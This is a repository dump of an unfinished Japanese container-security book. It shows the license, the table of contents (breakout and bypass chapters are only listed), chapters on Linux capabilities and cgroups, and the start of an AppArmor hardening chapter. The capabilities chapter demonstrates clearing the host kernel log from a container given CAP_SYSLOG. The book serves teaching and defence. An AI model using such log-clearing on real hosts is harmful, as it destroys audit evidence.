Repository: mrtc0/container-security-book
Branch: master
Commit: 39d9e25ec937
Files: 48
Total size: 139.3 KB

Directory structure:
gitextract_vq0wp2g_/

├── .gitignore
├── LICENSE
├── README.md
├── book.json
├── package.json
├── renovate.json
└── source/
    ├── README.md
    ├── REFERENCES.md
    ├── SUMMARY.md
    ├── capability/
    │   └── README.md
    ├── cgroup/
    │   └── README.md
    ├── container-basics.md
    ├── hardening/
    │   ├── README.md
    │   ├── apparmor.md
    │   ├── cis-benchmark.md
    │   ├── monitoring.md
    │   ├── no-new-privileges.md
    │   ├── runtime.md
    │   └── seccomp.md
    ├── introduction.md
    ├── kubernetes/
    │   ├── hardening/
    │   │   ├── README.md
    │   │   └── secret-management.md
    │   └── security/
    │       ├── README.md
    │       ├── ctf.md
    │       ├── etcd.md
    │       ├── hostpath-mount.md
    │       ├── metadata-service.md
    │       ├── privileged-pod.md
    │       └── service-account.md
    ├── lsm/
    │   └── apparmor.md
    ├── namespace/
    │   ├── README.md
    │   ├── chroot-and-pivot_root.md
    │   ├── mount.md
    │   ├── pid.md
    │   ├── user.md
    │   └── uts.md
    ├── seccomp/
    │   └── README.md
    ├── security/
    │   ├── DoS.md
    │   ├── README.md
    │   ├── adding-a-user-to-group.md
    │   ├── apparmor-bypass.md
    │   ├── breakout-to-host.md
    │   ├── image/
    │   │   ├── README.md
    │   │   ├── scanner.md
    │   │   └── secrets-in-layer.md
    │   ├── seccomp-bypass.md
    │   └── sensitive-file-mount.md
    └── styles/
        └── website.css

================================================
FILE CONTENTS
================================================

================================================
FILE: .gitignore
================================================
node_modules/
_book/


================================================
FILE: LICENSE
================================================
Attribution-NonCommercial 4.0 International

=======================================================================

Creative Commons Corporation ("Creative Commons") is not a law firm and
does not provide legal services or legal advice. Distribution of
Creative Commons public licenses does not create a lawyer-client or
other relationship. Creative Commons makes its licenses and related
information available on an "as-is" basis. Creative Commons gives no
warranties regarding its licenses, any material licensed under their
terms and conditions, or any related information. Creative Commons
disclaims all liability for damages resulting from their use to the
fullest extent possible.

Using Creative Commons Public Licenses

Creative Commons public licenses provide a standard set of terms and
conditions that creators and other rights holders may use to share
original works of authorship and other material subject to copyright
and certain other rights specified in the public license below. The
following considerations are for informational purposes only, are not
exhaustive, and do not form part of our licenses.

     Considerations for licensors: Our public licenses are
     intended for use by those authorized to give the public
     permission to use material in ways otherwise restricted by
     copyright and certain other rights. Our licenses are
     irrevocable. Licensors should read and understand the terms
     and conditions of the license they choose before applying it.
     Licensors should also secure all rights necessary before
     applying our licenses so that the public can reuse the
     material as expected. Licensors should clearly mark any
     material not subject to the license. This includes other CC-
     licensed material, or material used under an exception or
     limitation to copyright. More considerations for licensors:
    wiki.creativecommons.org/Considerations_for_licensors

     Considerations for the public: By using one of our public
     licenses, a licensor grants the public permission to use the
     licensed material under specified terms and conditions. If
     the licensor's permission is not necessary for any reason--for
     example, because of any applicable exception or limitation to
     copyright--then that use is not regulated by the license. Our
     licenses grant only permissions under copyright and certain
     other rights that a licensor has authority to grant. Use of
     the licensed material may still be restricted for other
     reasons, including because others have copyright or other
     rights in the material. A licensor may make special requests,
     such as asking that all changes be marked or described.
     Although not required by our licenses, you are encouraged to
     respect those requests where reasonable. More considerations
     for the public:
    wiki.creativecommons.org/Considerations_for_licensees

=======================================================================

Creative Commons Attribution-NonCommercial 4.0 International Public
License

By exercising the Licensed Rights (defined below), You accept and agree
to be bound by the terms and conditions of this Creative Commons
Attribution-NonCommercial 4.0 International Public License ("Public
License"). To the extent this Public License may be interpreted as a
contract, You are granted the Licensed Rights in consideration of Your
acceptance of these terms and conditions, and the Licensor grants You
such rights in consideration of benefits the Licensor receives from
making the Licensed Material available under these terms and
conditions.


Section 1 -- Definitions.

  a. Adapted Material means material subject to Copyright and Similar
     Rights that is derived from or based upon the Licensed Material
     and in which the Licensed Material is translated, altered,
     arranged, transformed, or otherwise modified in a manner requiring
     permission under the Copyright and Similar Rights held by the
     Licensor. For purposes of this Public License, where the Licensed
     Material is a musical work, performance, or sound recording,
     Adapted Material is always produced where the Licensed Material is
     synched in timed relation with a moving image.

  b. Adapter's License means the license You apply to Your Copyright
     and Similar Rights in Your contributions to Adapted Material in
     accordance with the terms and conditions of this Public License.

  c. Copyright and Similar Rights means copyright and/or similar rights
     closely related to copyright including, without limitation,
     performance, broadcast, sound recording, and Sui Generis Database
     Rights, without regard to how the rights are labeled or
     categorized. For purposes of this Public License, the rights
     specified in Section 2(b)(1)-(2) are not Copyright and Similar
     Rights.
  d. Effective Technological Measures means those measures that, in the
     absence of proper authority, may not be circumvented under laws
     fulfilling obligations under Article 11 of the WIPO Copyright
     Treaty adopted on December 20, 1996, and/or similar international
     agreements.

  e. Exceptions and Limitations means fair use, fair dealing, and/or
     any other exception or limitation to Copyright and Similar Rights
     that applies to Your use of the Licensed Material.

  f. Licensed Material means the artistic or literary work, database,
     or other material to which the Licensor applied this Public
     License.

  g. Licensed Rights means the rights granted to You subject to the
     terms and conditions of this Public License, which are limited to
     all Copyright and Similar Rights that apply to Your use of the
     Licensed Material and that the Licensor has authority to license.

  h. Licensor means the individual(s) or entity(ies) granting rights
     under this Public License.

  i. NonCommercial means not primarily intended for or directed towards
     commercial advantage or monetary compensation. For purposes of
     this Public License, the exchange of the Licensed Material for
     other material subject to Copyright and Similar Rights by digital
     file-sharing or similar means is NonCommercial provided there is
     no payment of monetary compensation in connection with the
     exchange.

  j. Share means to provide material to the public by any means or
     process that requires permission under the Licensed Rights, such
     as reproduction, public display, public performance, distribution,
     dissemination, communication, or importation, and to make material
     available to the public including in ways that members of the
     public may access the material from a place and at a time
     individually chosen by them.

  k. Sui Generis Database Rights means rights other than copyright
     resulting from Directive 96/9/EC of the European Parliament and of
     the Council of 11 March 1996 on the legal protection of databases,
     as amended and/or succeeded, as well as other essentially
     equivalent rights anywhere in the world.

  l. You means the individual or entity exercising the Licensed Rights
     under this Public License. Your has a corresponding meaning.


Section 2 -- Scope.

  a. License grant.

       1. Subject to the terms and conditions of this Public License,
          the Licensor hereby grants You a worldwide, royalty-free,
          non-sublicensable, non-exclusive, irrevocable license to
          exercise the Licensed Rights in the Licensed Material to:

            a. reproduce and Share the Licensed Material, in whole or
               in part, for NonCommercial purposes only; and

            b. produce, reproduce, and Share Adapted Material for
               NonCommercial purposes only.

       2. Exceptions and Limitations. For the avoidance of doubt, where
          Exceptions and Limitations apply to Your use, this Public
          License does not apply, and You do not need to comply with
          its terms and conditions.

       3. Term. The term of this Public License is specified in Section
          6(a).

       4. Media and formats; technical modifications allowed. The
          Licensor authorizes You to exercise the Licensed Rights in
          all media and formats whether now known or hereafter created,
          and to make technical modifications necessary to do so. The
          Licensor waives and/or agrees not to assert any right or
          authority to forbid You from making technical modifications
          necessary to exercise the Licensed Rights, including
          technical modifications necessary to circumvent Effective
          Technological Measures. For purposes of this Public License,
          simply making modifications authorized by this Section 2(a)
          (4) never produces Adapted Material.

       5. Downstream recipients.

            a. Offer from the Licensor -- Licensed Material. Every
               recipient of the Licensed Material automatically
               receives an offer from the Licensor to exercise the
               Licensed Rights under the terms and conditions of this
               Public License.

            b. No downstream restrictions. You may not offer or impose
               any additional or different terms or conditions on, or
               apply any Effective Technological Measures to, the
               Licensed Material if doing so restricts exercise of the
               Licensed Rights by any recipient of the Licensed
               Material.

       6. No endorsement. Nothing in this Public License constitutes or
          may be construed as permission to assert or imply that You
          are, or that Your use of the Licensed Material is, connected
          with, or sponsored, endorsed, or granted official status by,
          the Licensor or others designated to receive attribution as
          provided in Section 3(a)(1)(A)(i).

  b. Other rights.

       1. Moral rights, such as the right of integrity, are not
          licensed under this Public License, nor are publicity,
          privacy, and/or other similar personality rights; however, to
          the extent possible, the Licensor waives and/or agrees not to
          assert any such rights held by the Licensor to the limited
          extent necessary to allow You to exercise the Licensed
          Rights, but not otherwise.

       2. Patent and trademark rights are not licensed under this
          Public License.

       3. To the extent possible, the Licensor waives any right to
          collect royalties from You for the exercise of the Licensed
          Rights, whether directly or through a collecting society
          under any voluntary or waivable statutory or compulsory
          licensing scheme. In all other cases the Licensor expressly
          reserves any right to collect such royalties, including when
          the Licensed Material is used other than for NonCommercial
          purposes.


Section 3 -- License Conditions.

Your exercise of the Licensed Rights is expressly made subject to the
following conditions.

  a. Attribution.

       1. If You Share the Licensed Material (including in modified
          form), You must:

            a. retain the following if it is supplied by the Licensor
               with the Licensed Material:

                 i. identification of the creator(s) of the Licensed
                    Material and any others designated to receive
                    attribution, in any reasonable manner requested by
                    the Licensor (including by pseudonym if
                    designated);

                ii. a copyright notice;

               iii. a notice that refers to this Public License;

                iv. a notice that refers to the disclaimer of
                    warranties;

                 v. a URI or hyperlink to the Licensed Material to the
                    extent reasonably practicable;

            b. indicate if You modified the Licensed Material and
               retain an indication of any previous modifications; and

            c. indicate the Licensed Material is licensed under this
               Public License, and include the text of, or the URI or
               hyperlink to, this Public License.

       2. You may satisfy the conditions in Section 3(a)(1) in any
          reasonable manner based on the medium, means, and context in
          which You Share the Licensed Material. For example, it may be
          reasonable to satisfy the conditions by providing a URI or
          hyperlink to a resource that includes the required
          information.

       3. If requested by the Licensor, You must remove any of the
          information required by Section 3(a)(1)(A) to the extent
          reasonably practicable.

       4. If You Share Adapted Material You produce, the Adapter's
          License You apply must not prevent recipients of the Adapted
          Material from complying with this Public License.


Section 4 -- Sui Generis Database Rights.

Where the Licensed Rights include Sui Generis Database Rights that
apply to Your use of the Licensed Material:

  a. for the avoidance of doubt, Section 2(a)(1) grants You the right
     to extract, reuse, reproduce, and Share all or a substantial
     portion of the contents of the database for NonCommercial purposes
     only;

  b. if You include all or a substantial portion of the database
     contents in a database in which You have Sui Generis Database
     Rights, then the database in which You have Sui Generis Database
     Rights (but not its individual contents) is Adapted Material; and

  c. You must comply with the conditions in Section 3(a) if You Share
     all or a substantial portion of the contents of the database.

For the avoidance of doubt, this Section 4 supplements and does not
replace Your obligations under this Public License where the Licensed
Rights include other Copyright and Similar Rights.


Section 5 -- Disclaimer of Warranties and Limitation of Liability.

  a. UNLESS OTHERWISE SEPARATELY UNDERTAKEN BY THE LICENSOR, TO THE
     EXTENT POSSIBLE, THE LICENSOR OFFERS THE LICENSED MATERIAL AS-IS
     AND AS-AVAILABLE, AND MAKES NO REPRESENTATIONS OR WARRANTIES OF
     ANY KIND CONCERNING THE LICENSED MATERIAL, WHETHER EXPRESS,
     IMPLIED, STATUTORY, OR OTHER. THIS INCLUDES, WITHOUT LIMITATION,
     WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR
     PURPOSE, NON-INFRINGEMENT, ABSENCE OF LATENT OR OTHER DEFECTS,
     ACCURACY, OR THE PRESENCE OR ABSENCE OF ERRORS, WHETHER OR NOT
     KNOWN OR DISCOVERABLE. WHERE DISCLAIMERS OF WARRANTIES ARE NOT
     ALLOWED IN FULL OR IN PART, THIS DISCLAIMER MAY NOT APPLY TO YOU.

  b. TO THE EXTENT POSSIBLE, IN NO EVENT WILL THE LICENSOR BE LIABLE
     TO YOU ON ANY LEGAL THEORY (INCLUDING, WITHOUT LIMITATION,
     NEGLIGENCE) OR OTHERWISE FOR ANY DIRECT, SPECIAL, INDIRECT,
     INCIDENTAL, CONSEQUENTIAL, PUNITIVE, EXEMPLARY, OR OTHER LOSSES,
     COSTS, EXPENSES, OR DAMAGES ARISING OUT OF THIS PUBLIC LICENSE OR
     USE OF THE LICENSED MATERIAL, EVEN IF THE LICENSOR HAS BEEN
     ADVISED OF THE POSSIBILITY OF SUCH LOSSES, COSTS, EXPENSES, OR
     DAMAGES. WHERE A LIMITATION OF LIABILITY IS NOT ALLOWED IN FULL OR
     IN PART, THIS LIMITATION MAY NOT APPLY TO YOU.

  c. The disclaimer of warranties and limitation of liability provided
     above shall be interpreted in a manner that, to the extent
     possible, most closely approximates an absolute disclaimer and
     waiver of all liability.


Section 6 -- Term and Termination.

  a. This Public License applies for the term of the Copyright and
     Similar Rights licensed here. However, if You fail to comply with
     this Public License, then Your rights under this Public License
     terminate automatically.

  b. Where Your right to use the Licensed Material has terminated under
     Section 6(a), it reinstates:

       1. automatically as of the date the violation is cured, provided
          it is cured within 30 days of Your discovery of the
          violation; or

       2. upon express reinstatement by the Licensor.

     For the avoidance of doubt, this Section 6(b) does not affect any
     right the Licensor may have to seek remedies for Your violations
     of this Public License.

  c. For the avoidance of doubt, the Licensor may also offer the
     Licensed Material under separate terms or conditions or stop
     distributing the Licensed Material at any time; however, doing so
     will not terminate this Public License.

  d. Sections 1, 5, 6, 7, and 8 survive termination of this Public
     License.


Section 7 -- Other Terms and Conditions.

  a. The Licensor shall not be bound by any additional or different
     terms or conditions communicated by You unless expressly agreed.

  b. Any arrangements, understandings, or agreements regarding the
     Licensed Material not stated herein are separate from and
     independent of the terms and conditions of this Public License.


Section 8 -- Interpretation.

  a. For the avoidance of doubt, this Public License does not, and
     shall not be interpreted to, reduce, limit, restrict, or impose
     conditions on any use of the Licensed Material that could lawfully
     be made without permission under this Public License.

  b. To the extent possible, if any provision of this Public License is
     deemed unenforceable, it shall be automatically reformed to the
     minimum extent necessary to make it enforceable. If the provision
     cannot be reformed, it shall be severed from this Public License
     without affecting the enforceability of the remaining terms and
     conditions.

  c. No term or condition of this Public License will be waived and no
     failure to comply consented to unless expressly agreed to by the
     Licensor.

  d. Nothing in this Public License constitutes or may be interpreted
     as a limitation upon, or waiver of, any privileges and immunities
     that apply to the Licensor or You, including from the legal
     processes of any jurisdiction or authority.

=======================================================================

Creative Commons is not a party to its public
licenses. Notwithstanding, Creative Commons may elect to apply one of
its public licenses to material it publishes and in those instances
will be considered the “Licensor.” The text of the Creative Commons
public licenses is dedicated to the public domain under the CC0 Public
Domain Dedication. Except for the limited purpose of indicating that
material is shared under a Creative Commons public license or as
otherwise permitted by the Creative Commons policies published at
creativecommons.org/policies, Creative Commons does not authorize the
use of the trademark "Creative Commons" or any other trademark or logo
of Creative Commons without its prior written consent including,
without limitation, in connection with any unauthorized modifications
to any of its public licenses or any other arrangements,
understandings, or agreements concerning use of licensed material. For
the avoidance of doubt, this paragraph does not form part of the
public licenses.

Creative Commons may be contacted at creativecommons.org.


================================================
FILE: README.md
================================================
# container-security-book

---

# About

これから Linux コンテナのセキュリティを学びたい人のための文書です。
普段からコンテナを扱っているが、コンテナの基礎技術やセキュリティについては分からないという人が、それらを理解できる足がかりになるように書かれています。

誤字脱字や間違いなどあれば https://github.com/mrtc0/container-security-book に Issue もしくは Pull Request を立ててください。
ご意見、ご感想等は Twitter ハッシュタグ #container-security でツイートをお願いします。

# Status

この文書はまだ未完成の内容となっています。

# License

この書籍に記述されているすべてのソースコードは、MITライセンスに基づいたオープンソースソフトウェアとして提供されます。
また、文章は Creative Commons の Attribution-NonCommercial 4.0（CC BY-NC 4.0）ライセンスに基づいて提供されます。


================================================
FILE: book.json
================================================
{
  "root": "./source",
  "title": "Container Security Book",
  "description": "これから Linux コンテナのセキュリティを学びたい人のための文書",
  "author": "Kohei Morita @mrtc0",
  "plugins": [
    "image-captions",
    "anchors"
  ]
}


================================================
FILE: package.json
================================================
{
  "name": "container-security-book",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "build": "honkit build",
    "serve": "honkit serve",
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "keywords": [],
  "author": "",
  "license": "ISC",
  "devDependencies": {
    "honkit": "3.6.23"
  },
  "dependencies": {
    "gitbook-plugin-anchors": "^0.7.1",
    "gitbook-plugin-image-captions": "^3.1.0"
  }
}


================================================
FILE: renovate.json
================================================
{
  "extends": [
    "config:base"
  ]
}


================================================
FILE: source/README.md
================================================
---
author: mrtc0
fullTitle: "Container Security Book - Linux コンテナのセキュリティを知ろう"
description: "これから Linux コンテナの基礎技術やセキュリティを学びたい人のための文書です。"
---

# Container Security Book

> ⚠️この文書は製作中のものです

# About

これから Linux コンテナのセキュリティを学びたい人のための文書です。  
普段からコンテナを扱っているが、コンテナの基礎技術やセキュリティについては分からないという人が、それらを理解できる足がかりになるように書かれています。

誤字脱字や間違いなどあれば https://github.com/mrtc0/container-security-book に Issue もしくは Pull Request を立ててください。  
ご意見、ご感想等は Twitter ハッシュタグ #container_security でツイートをお願いします。

# License

この書籍に記述されているすべてのソースコードは MIT ライセンスとします。  
また、文章は Creative Commons Attribution-NonCommercial 4.0（CC BY-NC 4.0）ライセンスに基づいて提供されます。


================================================
FILE: source/REFERENCES.md
================================================
# References

* Docker Documentaion / https://docs.docker.com/
* LXD / https://linuxcontainers.org/lxd/docs/master/ (日本語訳: https://lxd-ja.readthedocs.io/ja/latest/)
* Understanding and Hardening Linux Containers - NCC Group Whitepaper / https://research.nccgroup.com/wp-content/uploads/2020/07/ncc_group_understanding_hardening_linux_containers-1-1.pdf
* Abusing Privileged and Unprivileged Linux Containers - An NCC Group Publication / https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container_whitepaper.pdf
* コンテナ技術入門 - 仮想化との違いを知り、要素技術を触って学ぼう - エンジニアHub / https://eh-career.com/engineerhub/entry/2019/02/05/103000
* LXCで学ぶコンテナ入門 －軽量仮想化環境を実現する技術 - gihyo.jp / https://gihyo.jp/admin/serial/01/linux_containers
* Docker/Kubernetes開発・運用のためのセキュリティ実践ガイド / https://www.amazon.co.jp/dp/4839970505
* Container Security: Fundamental Technology Concepts That Protect Containerized Applications / https://www.amazon.co.jp/dp/1492056707


================================================
FILE: source/SUMMARY.md
================================================
# Summary

## はじめに

- [About](README.md)
- [Introduction](introduction.md)

## コンテナの基礎技術

- [コンテナの基礎技術](container-basics.md)
- [Namespace](namespace/README.md)
  - [UTS Namespace](namespace/uts.md)
  - [PID Namespace](namespace/pid.md)
  - [Mount Namespace](namespace/mount.md)
  - [User Namespace](namespace/user.md)
- [chroot and pivot_root](namespace/chroot-and-pivot_root.md)
- [Capability](capability/README.md)
- [Seccomp](seccomp/README.md)
- [AppArmor](lsm/apparmor.md)
- [cgroup](cgroup/README.md)

## コンテナのセキュリティと攻撃例

- [Security](security/README.md)
  - [Breakout Container](security/breakout-to-host.md)
  - [Sensitive file mount](security/sensitive-file-mount.md)
  - [DoS](security/DoS.md)
  - [Adding a user to group](security/adding-a-user-to-group.md)
  - [AppArmor Bypass](security/apparmor-bypass.md)
  - [seccomp Bypass](security/seccomp-bypass.md)
  - [Secrets in Layer](security/image/secrets-in-layer.md)
  - [Image Scanner](security/image/scanner.md)

## Hardening Container

- [Hardening Container](hardening/README.md)
  - [No New Privileges](hardening/no-new-privileges.md)
  - [AppArmor](hardening/apparmor.md)
  - [seccomp](hardening/seccomp.md)
  - [runtime](hardening/runtime.md)
  - [Monitoring](hardening/monitoring.md)
  - [CIS Benchmark](hardening/cis-benchmark.md)

## Kubernetes のセキュリティと攻撃例

- [Kubernetes Security](kubernetes/security/README.md)
  - [各種クラウドプロバイダの Metadata Service へのアクセス](kubernetes/security/metadata-service.md)
  - [hostPath を使った Node へのエスケープ](kubernetes/security/hostpath-mount.md)
  - [Pod の権限と Node へのエスケープ](kubernetes/security/privileged-pod.md)
  - [ServiceAccount の過剰な権限](kubernetes/security/service-account.md)
  - [etcd](kubernetes/security/etcd.md)

## Hardening Kubernetes

- [Hardening Kubernetes](kubernetes/hardening/README.md)
  - [Secret Management](kubernetes/hardening/secret-management.md)

## References

- [References](REFERENCES.md)


================================================
FILE: source/capability/README.md
================================================
# Capability

Linux には Capability と呼ばれる仕組みがあり、ファイル及びプロセスに対して権限を細かく設定することができます。  

例えばポート番号が1024以下で Listen する場合は特権が必要になります。つまり root として起動する必要があるのですが、 `CAP_NET_BIND_SERVICE` という Capability を与えることで起動することができます。

```sh
ubuntu@docker:~$ cp $(which python3) mypython3
# Capability がないので80番ポートで Listen できない
ubuntu@docker:~$ getcap mypython3
ubuntu@docker:~$ ./mypython3 -m http.server 80
Traceback (most recent call last):
  File "/usr/lib/python3.8/runpy.py", line 194, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "/usr/lib/python3.8/runpy.py", line 87, in _run_code
    exec(code, run_globals)
  File "/usr/lib/python3.8/http/server.py", line 1294, in <module>
    test(
  File "/usr/lib/python3.8/http/server.py", line 1249, in test
    with ServerClass(addr, HandlerClass) as httpd:
  File "/usr/lib/python3.8/socketserver.py", line 452, in __init__
    self.server_bind()
  File "/usr/lib/python3.8/http/server.py", line 1292, in server_bind
    return super().server_bind()
  File "/usr/lib/python3.8/http/server.py", line 138, in server_bind
    socketserver.TCPServer.server_bind(self)
  File "/usr/lib/python3.8/socketserver.py", line 466, in server_bind
    self.socket.bind(self.server_address)
PermissionError: [Errno 13] Permission denied

# Capability を付与したので Listen できる
ubuntu@docker:~$ sudo setcap 'cap_net_bind_service=+ep' ./mypython3
ubuntu@docker:~$ ./mypython3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

Docker コンテナでは `--cap-add` や `--cap-drop` を利用して Capability を付与したり削除したりできます。  
ping コマンドの実行は CAP_NET_RAW が必要なので、drop することで実行できないことが確認できます。[^1]

```sh
$ docker run --rm -it ubuntu:latest bash
root@4e89e243ccee:/# apt-get -qq update ; apt-get -qq -y install iputils-ping
root@4e89e243ccee:/# ps
root@4e89e243ccee:/# getpcaps 1
1: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
root@4e89e243ccee:/# ping -c 1 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=113 time=17.9 ms

$ docker run --cap-drop net_raw --rm -it ubuntu:latest bash
root@31bb88ca04f8:/# apt-get -qq update ; apt-get -qq -y install iputils-ping
root@31bb88ca04f8:/# ps
root@31bb88ca04f8:/# getpcaps 1
1: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eiproot@31bb88ca04f8:/# ping 8.8.8.8
root@4e89e243ccee:/# ping 8.8.8.8
bash: /usr/bin/ping: Operation not permitted
```

Capability は数多くあり、中にはコンテナからホストに影響を及ぼすものがあります。  
そのため、過剰な Capability の付与は Breakout の原因となります。

簡単な例として `CAP_SYSLOG` があります。これをコンテナに付与すると `dmesg` 経由でカーネルのログを取得及び消去することができます。  

```sh
ubuntu@docker:~$ docker run --cap-add syslog --rm -it ubuntu:20.04
root@1577bebb133d:/# dmesg | head
[    0.000000] Linux version 5.4.0-47-generic (buildd@lcy01-amd64-014) (gcc version 9.3.0 (Ubuntu 9.3.0-10ubuntu2)) #51-Ubuntu SMP Fri Sep 4 19:50:52 UTC 2020 (Ubuntu 5.4.0-47.51-generic 5.4.55)
[    0.000000] Command line: earlyprintk=serial console=ttyS0 root=/dev/vda1 rw panic=1 no_timer_check
[    0.000000] KERNEL supported cpus:
[    0.000000]   Intel GenuineIntel
[    0.000000]   AMD AuthenticAMD
[    0.000000]   Hygon HygonGenuine
[    0.000000]   Centaur CentaurHauls
[    0.000000]   zhaoxin   Shanghai
[    0.000000] x86/fpu: Supporting XSAVE feature 0x001: 'x87 floating point registers'
[    0.000000] x86/fpu: Supporting XSAVE feature 0x002: 'SSE registers'
root@1577bebb133d:/# dmesg -C
root@1577bebb133d:/# dmesg
```

Docker や LXC などではこのような危険な Capability をデフォルトで付与しないようになっています。[^2]  
危険な Capability を与えた場合に生じる脆弱性については[ホストへのエスケープ](../security/breakout-to-host.md)をご参照ください。

---

* [^1] https://blog.ssrf.in/post/ping-does-not-require-cap-net-raw-capability/ "net.ipv4.ping_group_range を指定すると CAP_NET_RAW は必要ありません"
* [^2] https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities "Runtime privilege and Linux capabilities / docker docs"


================================================
FILE: source/cgroup/README.md
================================================
# cgroup

cgroup はプロセスをグループ化し、そのグループに属するプロセスに対してリソースの制限を行う仕組みです。  
cgroup は cgroupfs と呼ばれるファイルシステムを通して操作します。多くは `/sys/fs/cgroup` にマウントされています。

制限できるリソースのことをサブシステムと呼び、CPU のコア数やメモリ使用量、プロセス数などを制限できます。  
サブシステムについては man をご参照ください[^1]。

## CPU の利用を制限する

無限ループのプロセスを作成し、そのプロセスに対して CPU 利用率を100%にしてみます。  
cgroup 管理下にない状態で `top` で確認すると 100% 利用していることが確認できます。

```sh
$ while true; do : ; done &
[1] 16541

$ top

    PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND
  16541 ubuntu    20   0   10252   1960      0 R 100.0   0.0   0:18.27 bash
```

このプロセスを cgroup 管理下に置きます。

```sh
$ sudo mkdir /sys/fs/cgroup/cpu/test
$ echo 16541 | sudo tee -a /sys/fs/cgroup/cpu/test/tasks
```

続いてCPU利用率を50%にするように調整します。すると 50% 前後に落ち着くことが確認できます。

```sh
$ echo 50000 | sudo tee -a /sys/fs/cgroup/cpu/test/cpu.cfs_quota_us
50000
$ top
    PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND
  16541 ubuntu    20   0   10252   1960      0 R  49.8   0.0   9:48.24 bash
```

## メモリ使用量を制限する

続いてメモリ使用量も200MBに制限してみます。

```sh
$ stress --vm 1 --vm-bytes 500M
stress: info: [17223] dispatching hogs: 0 cpu, 0 io, 1 vm, 0 hdd

$ top
   PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND
  17273 root      20   0  515860 291760    208 R 100.0   7.2   0:23.89 stress
```

プロセスを cgroup 管理下に置きます。

```sh
$ sudo mkdir /sys/fs/cgroup/memory/test
$ echo 17272 | sudo tee -a /sys/fs/cgroup/memory/test/tasks
17273
```

メモリ使用量を 200MB に制限します。

```sh
ubuntu@docker:~$ echo 200M | sudo tee -a /sys/fs/cgroup/memory/test/memory.limit_in_bytes
200M
```

すると `stress` が OOM Killer によって kill されます。

```sh
stress: FAIL: [17272] (415) <-- worker 17273 got signal 9
stress: WARN: [17272] (417) now reaping child worker processes
stress: FAIL: [17272] (451) failed run completed in 55s

$ dmesg
[23834.514678] oom-kill:constraint=CONSTRAINT_MEMCG,nodemask=(null),cpuset=/,mems_allowed=0,oom_memcg=/test,task_memcg=/test,task=stress,pid=17273,uid=0
[23834.514683] Memory cgroup out of memory: Killed process 17273 (stress) total-vm:515860kB, anon-rss:204432kB, file-rss:336kB, shmem-rss:0kB, UID:0 pgtables:444kB oom_score_adj:0
[23834.519784] oom_reaper: reaped process 17273 (stress), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
```

# docker で cgroup を使う

docker では `run` サブコマンドに対して `-c` フラグや `-m` フラグを指定することで制限できます。詳しくは `docker run --help` で確認してください。

```sh
$ docker run --rm -it -m 100m --memory-swappiness=0 ubuntu:20.04 bash
root@36570f483e85:/# stress --vm 2 --vm-bytes 100M
stress: info: [255] dispatching hogs: 0 cpu, 0 io, 2 vm, 0 hdd
stress: FAIL: [255] (415) <-- worker 257 got signal 9
stress: WARN: [255] (417) now reaping child worker processes
stress: FAIL: [255] (415) <-- worker 256 got signal 9
stress: WARN: [255] (417) now reaping child worker processes
stress: FAIL: [255] (451) failed run completed in 0s

$ dmesg
[24555.596613] Memory cgroup out of memory: Killed process 17691 (stress) total-vm:106260kB, anon-rss:45456kB, file-rss:320kB, shmem-rss:0kB, UID:0 pgtables:136kB oom_score_adj:0
[24555.596719] oom_reaper: reaped process 17692 (stress), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[24555.600384] oom_reaper: reaped process 17691 (stress), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB

$ cat /sys/fs/cgroup/memory/docker/36570f483e8510887b7be178fba3830f1088aa694131c89a18043ef3db220658/memory.limit_in_bytes
104857600
```

---

[^1]: https://man7.org/linux/man-pages/man7/cgroups.7.html


================================================
FILE: source/container-basics.md
================================================
# コンテナの基礎技術

本章では Linux コンテナが成り立っている基礎技術について紹介します。  
Linux コンテナはホストと分離するために Namespace や cgroup の他、seccomp や LSM などを用いた多層防御モデルとなっています。  
それぞれの技術について実際に動かしながら、ただのプロセスがコンテナになるまでの過程をみていきましょう。


================================================
FILE: source/hardening/README.md
================================================
# Hardening Container

本章ではコンテナをよりセキュアに運用するための方法について紹介します。  
AppArmor や seccomp のプロファイルの自動生成やセキュアな OCI / CRI ランタイム、コンテナのモニタリングについて取り上げます。


================================================
FILE: source/hardening/apparmor.md
================================================
# AppArmor

AppArmor はコンテナが侵害されて各保護レイヤを突破された場合に最後の砦となります。そのため、アプリケーションに適したプロファイルを適用することでコンテナをセキュアに運用することができます。  
一方で、AppArmor はシンタックスが複雑であったり、アプリケーションがどのファイルにアクセスしているか把握する必要があったりなど、プロファイルを生成するコストがかかるという面もあります。

ここでは AppArmor プロファイルを比較的簡単に生成する方法を紹介します。

## `docker diff` で変更されたファイルを一覧する

`docker diff` を使うことで変更されたファイルやディレクトリを取得することができます。例えば nginx コンテナを起動し、 `docker diff` を実行することで次のようなリストを取得することができます。

```sh
ubuntu@sandbox:~$ docker run --rm -it nginx:latest
...

ubuntu@sandbox:~$ docker ps
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS               NAMES
ae9a66bf223e        nginx:latest        "/docker-entrypoint.…"   3 minutes ago       Up 3 minutes        80/tcp              sweet_archimedes
ubuntu@sandbox:~$ docker diff ae9a
C /run
A /run/nginx.pid
C /var
C /var/cache
C /var/cache/nginx
A /var/cache/nginx/proxy_temp
A /var/cache/nginx/scgi_temp
A /var/cache/nginx/uwsgi_temp
A /var/cache/nginx/client_temp
